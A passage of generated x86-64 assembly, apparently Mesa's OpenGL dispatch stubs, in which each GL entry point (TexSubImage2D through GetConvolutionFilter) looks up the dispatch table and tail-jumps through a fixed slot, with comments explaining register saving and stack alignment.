.globl GL_PREFIX(TexSubImage2D)
.type GL_PREFIX(TexSubImage2D), @function
GL_PREFIX(TexSubImage2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2664(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexSubImage2D), .-GL_PREFIX(TexSubImage2D)
	/*
	 * Generated GL dispatch stubs.  Each entry point below follows the
	 * same three-way pattern:
	 *   GLX_USE_TLS:  fetch the thread's dispatch table and tail-jump
	 *                 through the function's slot.
	 *   PTHREADS:     argument registers are live, so save them, call
	 *                 _x86_64_get_dispatch, restore, then tail-jump.
	 *   otherwise:    use _glapi_Dispatch if already set; else fall to
	 *                 label 1 and call _glapi_get_dispatch.
	 * Where an extra "pushq %rbp" appears it is only padding so that
	 * %rsp stays 16-byte aligned at the call (SysV AMD64 ABI).
	 */
	/* glPopClientAttrib: no args; %rbp push is pure alignment padding; slot offset 2672 */
	.p2align	4,,15
	.globl	GL_PREFIX(PopClientAttrib)
	.type	GL_PREFIX(PopClientAttrib), @function
GL_PREFIX(PopClientAttrib):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2672(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	2672(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2672(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	2672(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PopClientAttrib), .-GL_PREFIX(PopClientAttrib)

	/* glPushClientAttrib: 1 integer arg (%rdi); slot offset 2680 */
	.p2align	4,,15
	.globl	GL_PREFIX(PushClientAttrib)
	.type	GL_PREFIX(PushClientAttrib), @function
GL_PREFIX(PushClientAttrib):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2680(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2680(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2680(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2680(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PushClientAttrib), .-GL_PREFIX(PushClientAttrib)

	/* glBlendColor: 4 args (%rdi..%rcx) + %rbp pad; slot offset 2688 */
	.p2align	4,,15
	.globl	GL_PREFIX(BlendColor)
	.type	GL_PREFIX(BlendColor), @function
GL_PREFIX(BlendColor):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2688(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2688(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2688(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2688(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BlendColor), .-GL_PREFIX(BlendColor)

	/* glBlendEquation: 1 integer arg (%rdi); slot offset 2696 */
	.p2align	4,,15
	.globl	GL_PREFIX(BlendEquation)
	.type	GL_PREFIX(BlendEquation), @function
GL_PREFIX(BlendEquation):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2696(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2696(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2696(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2696(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BlendEquation), .-GL_PREFIX(BlendEquation)

	/* glDrawRangeElements: 6 args in %rdi..%r9 (+%rbp pad); slot offset 2704 */
	.p2align	4,,15
	.globl	GL_PREFIX(DrawRangeElements)
	.type	GL_PREFIX(DrawRangeElements), @function
GL_PREFIX(DrawRangeElements):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2704(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2704(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2704(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2704(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DrawRangeElements), .-GL_PREFIX(DrawRangeElements)

	/* glColorTable: 6 args in %rdi..%r9 (+%rbp pad); slot offset 2712 */
	.p2align	4,,15
	.globl	GL_PREFIX(ColorTable)
	.type	GL_PREFIX(ColorTable), @function
GL_PREFIX(ColorTable):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2712(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2712(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2712(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2712(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ColorTable), .-GL_PREFIX(ColorTable)
	/*
	 * Generated GL dispatch stubs.  Each entry point below follows the
	 * same three-way pattern:
	 *   GLX_USE_TLS:  fetch the thread's dispatch table and tail-jump
	 *                 through the function's slot.
	 *   PTHREADS:     argument registers are live, so save them, call
	 *                 _x86_64_get_dispatch, restore, then tail-jump.
	 *   otherwise:    use _glapi_Dispatch if already set; else fall to
	 *                 label 1 and call _glapi_get_dispatch.
	 * Where an extra "pushq %rbp" appears it is only padding so that
	 * %rsp stays 16-byte aligned at the call (SysV AMD64 ABI).
	 */
	/* glColorTableParameterfv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2720 */
	.p2align	4,,15
	.globl	GL_PREFIX(ColorTableParameterfv)
	.type	GL_PREFIX(ColorTableParameterfv), @function
GL_PREFIX(ColorTableParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2720(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2720(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2720(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2720(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ColorTableParameterfv), .-GL_PREFIX(ColorTableParameterfv)

	/* glColorTableParameteriv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2728 */
	.p2align	4,,15
	.globl	GL_PREFIX(ColorTableParameteriv)
	.type	GL_PREFIX(ColorTableParameteriv), @function
GL_PREFIX(ColorTableParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2728(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2728(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2728(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2728(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ColorTableParameteriv), .-GL_PREFIX(ColorTableParameteriv)

	/* glCopyColorTable: 5 args (%rdi..%r8); odd push count aligns %rsp; slot offset 2736 */
	.p2align	4,,15
	.globl	GL_PREFIX(CopyColorTable)
	.type	GL_PREFIX(CopyColorTable), @function
GL_PREFIX(CopyColorTable):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2736(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2736(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2736(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2736(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyColorTable), .-GL_PREFIX(CopyColorTable)

	/* glGetColorTable: 4 args (%rdi..%rcx) + %rbp pad; slot offset 2744 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetColorTable)
	.type	GL_PREFIX(GetColorTable), @function
GL_PREFIX(GetColorTable):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2744(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2744(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2744(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2744(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetColorTable), .-GL_PREFIX(GetColorTable)

	/* glGetColorTableParameterfv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2752 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetColorTableParameterfv)
	.type	GL_PREFIX(GetColorTableParameterfv), @function
GL_PREFIX(GetColorTableParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2752(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2752(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2752(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2752(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetColorTableParameterfv), .-GL_PREFIX(GetColorTableParameterfv)

	/* glGetColorTableParameteriv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2760 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetColorTableParameteriv)
	.type	GL_PREFIX(GetColorTableParameteriv), @function
GL_PREFIX(GetColorTableParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2760(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2760(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2760(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2760(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetColorTableParameteriv), .-GL_PREFIX(GetColorTableParameteriv)

	/* glColorSubTable: 6 args in %rdi..%r9 (+%rbp pad); slot offset 2768 */
	.p2align	4,,15
	.globl	GL_PREFIX(ColorSubTable)
	.type	GL_PREFIX(ColorSubTable), @function
GL_PREFIX(ColorSubTable):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2768(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2768(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2768(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2768(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ColorSubTable), .-GL_PREFIX(ColorSubTable)
	/*
	 * Generated GL dispatch stubs.  Each entry point below follows the
	 * same three-way pattern:
	 *   GLX_USE_TLS:  fetch the thread's dispatch table and tail-jump
	 *                 through the function's slot.
	 *   PTHREADS:     argument registers are live, so save them, call
	 *                 _x86_64_get_dispatch, restore, then tail-jump.
	 *   otherwise:    use _glapi_Dispatch if already set; else fall to
	 *                 label 1 and call _glapi_get_dispatch.
	 * Where an extra "pushq %rbp" appears it is only padding so that
	 * %rsp stays 16-byte aligned at the call (SysV AMD64 ABI).
	 */
	/* glCopyColorSubTable: 5 args (%rdi..%r8); odd push count aligns %rsp; slot offset 2776 */
	.p2align	4,,15
	.globl	GL_PREFIX(CopyColorSubTable)
	.type	GL_PREFIX(CopyColorSubTable), @function
GL_PREFIX(CopyColorSubTable):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2776(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2776(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2776(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2776(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyColorSubTable), .-GL_PREFIX(CopyColorSubTable)

	/* glConvolutionFilter1D: 6 args in %rdi..%r9 (+%rbp pad); slot offset 2784 */
	.p2align	4,,15
	.globl	GL_PREFIX(ConvolutionFilter1D)
	.type	GL_PREFIX(ConvolutionFilter1D), @function
GL_PREFIX(ConvolutionFilter1D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2784(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2784(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2784(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2784(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ConvolutionFilter1D), .-GL_PREFIX(ConvolutionFilter1D)

	/* glConvolutionFilter2D: 7 args, 6 in %rdi..%r9 (+%rbp pad); slot offset 2792 */
	.p2align	4,,15
	.globl	GL_PREFIX(ConvolutionFilter2D)
	.type	GL_PREFIX(ConvolutionFilter2D), @function
GL_PREFIX(ConvolutionFilter2D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2792(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2792(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2792(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2792(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ConvolutionFilter2D), .-GL_PREFIX(ConvolutionFilter2D)

	/*
	 * glConvolutionParameterf: 2 integer args plus a float in %xmm0.
	 * xmm registers cannot be pushed, so a 24-byte frame spills
	 * %rdi/%rsi/%xmm0 (entry %rsp%16==8, so 8+24 keeps the call
	 * 16-byte aligned); slot offset 2800.
	 */
	.p2align	4,,15
	.globl	GL_PREFIX(ConvolutionParameterf)
	.type	GL_PREFIX(ConvolutionParameterf), @function
GL_PREFIX(ConvolutionParameterf):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2800(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%rsi, 8(%rsp)
	movq	%xmm0, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm0
	movq	8(%rsp), %rsi
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	2800(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2800(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%rsi, 8(%rsp)
	movq	%xmm0, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm0
	movq	8(%rsp), %rsi
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	2800(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ConvolutionParameterf), .-GL_PREFIX(ConvolutionParameterf)

	/* glConvolutionParameterfv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2808 */
	.p2align	4,,15
	.globl	GL_PREFIX(ConvolutionParameterfv)
	.type	GL_PREFIX(ConvolutionParameterfv), @function
GL_PREFIX(ConvolutionParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2808(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2808(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2808(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2808(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ConvolutionParameterfv), .-GL_PREFIX(ConvolutionParameterfv)

	/* glConvolutionParameteri: 3 integer args (%rdi, %rsi, %rdx); slot offset 2816 */
	.p2align	4,,15
	.globl	GL_PREFIX(ConvolutionParameteri)
	.type	GL_PREFIX(ConvolutionParameteri), @function
GL_PREFIX(ConvolutionParameteri):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2816(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2816(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2816(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2816(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ConvolutionParameteri), .-GL_PREFIX(ConvolutionParameteri)

	/* glConvolutionParameteriv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2824 */
	.p2align	4,,15
	.globl	GL_PREFIX(ConvolutionParameteriv)
	.type	GL_PREFIX(ConvolutionParameteriv), @function
GL_PREFIX(ConvolutionParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2824(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2824(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2824(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2824(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ConvolutionParameteriv), .-GL_PREFIX(ConvolutionParameteriv)
	/*
	 * Generated GL dispatch stubs.  Each entry point below follows the
	 * same three-way pattern:
	 *   GLX_USE_TLS:  fetch the thread's dispatch table and tail-jump
	 *                 through the function's slot.
	 *   PTHREADS:     argument registers are live, so save them, call
	 *                 _x86_64_get_dispatch, restore, then tail-jump.
	 *   otherwise:    use _glapi_Dispatch if already set; else fall to
	 *                 label 1 and call _glapi_get_dispatch.
	 * Where an extra "pushq %rbp" appears it is only padding so that
	 * %rsp stays 16-byte aligned at the call (SysV AMD64 ABI).
	 */
	/* glCopyConvolutionFilter1D: 5 args (%rdi..%r8); slot offset 2832 */
	.p2align	4,,15
	.globl	GL_PREFIX(CopyConvolutionFilter1D)
	.type	GL_PREFIX(CopyConvolutionFilter1D), @function
GL_PREFIX(CopyConvolutionFilter1D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2832(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2832(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2832(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2832(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyConvolutionFilter1D), .-GL_PREFIX(CopyConvolutionFilter1D)

	/* glCopyConvolutionFilter2D: 6 args in %rdi..%r9 (+%rbp pad); slot offset 2840 */
	.p2align	4,,15
	.globl	GL_PREFIX(CopyConvolutionFilter2D)
	.type	GL_PREFIX(CopyConvolutionFilter2D), @function
GL_PREFIX(CopyConvolutionFilter2D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2840(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2840(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2840(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2840(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyConvolutionFilter2D), .-GL_PREFIX(CopyConvolutionFilter2D)

	/* glGetConvolutionFilter: 4 args (%rdi..%rcx) + %rbp pad; slot offset 2848 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetConvolutionFilter)
	.type	GL_PREFIX(GetConvolutionFilter), @function
GL_PREFIX(GetConvolutionFilter):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2848(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
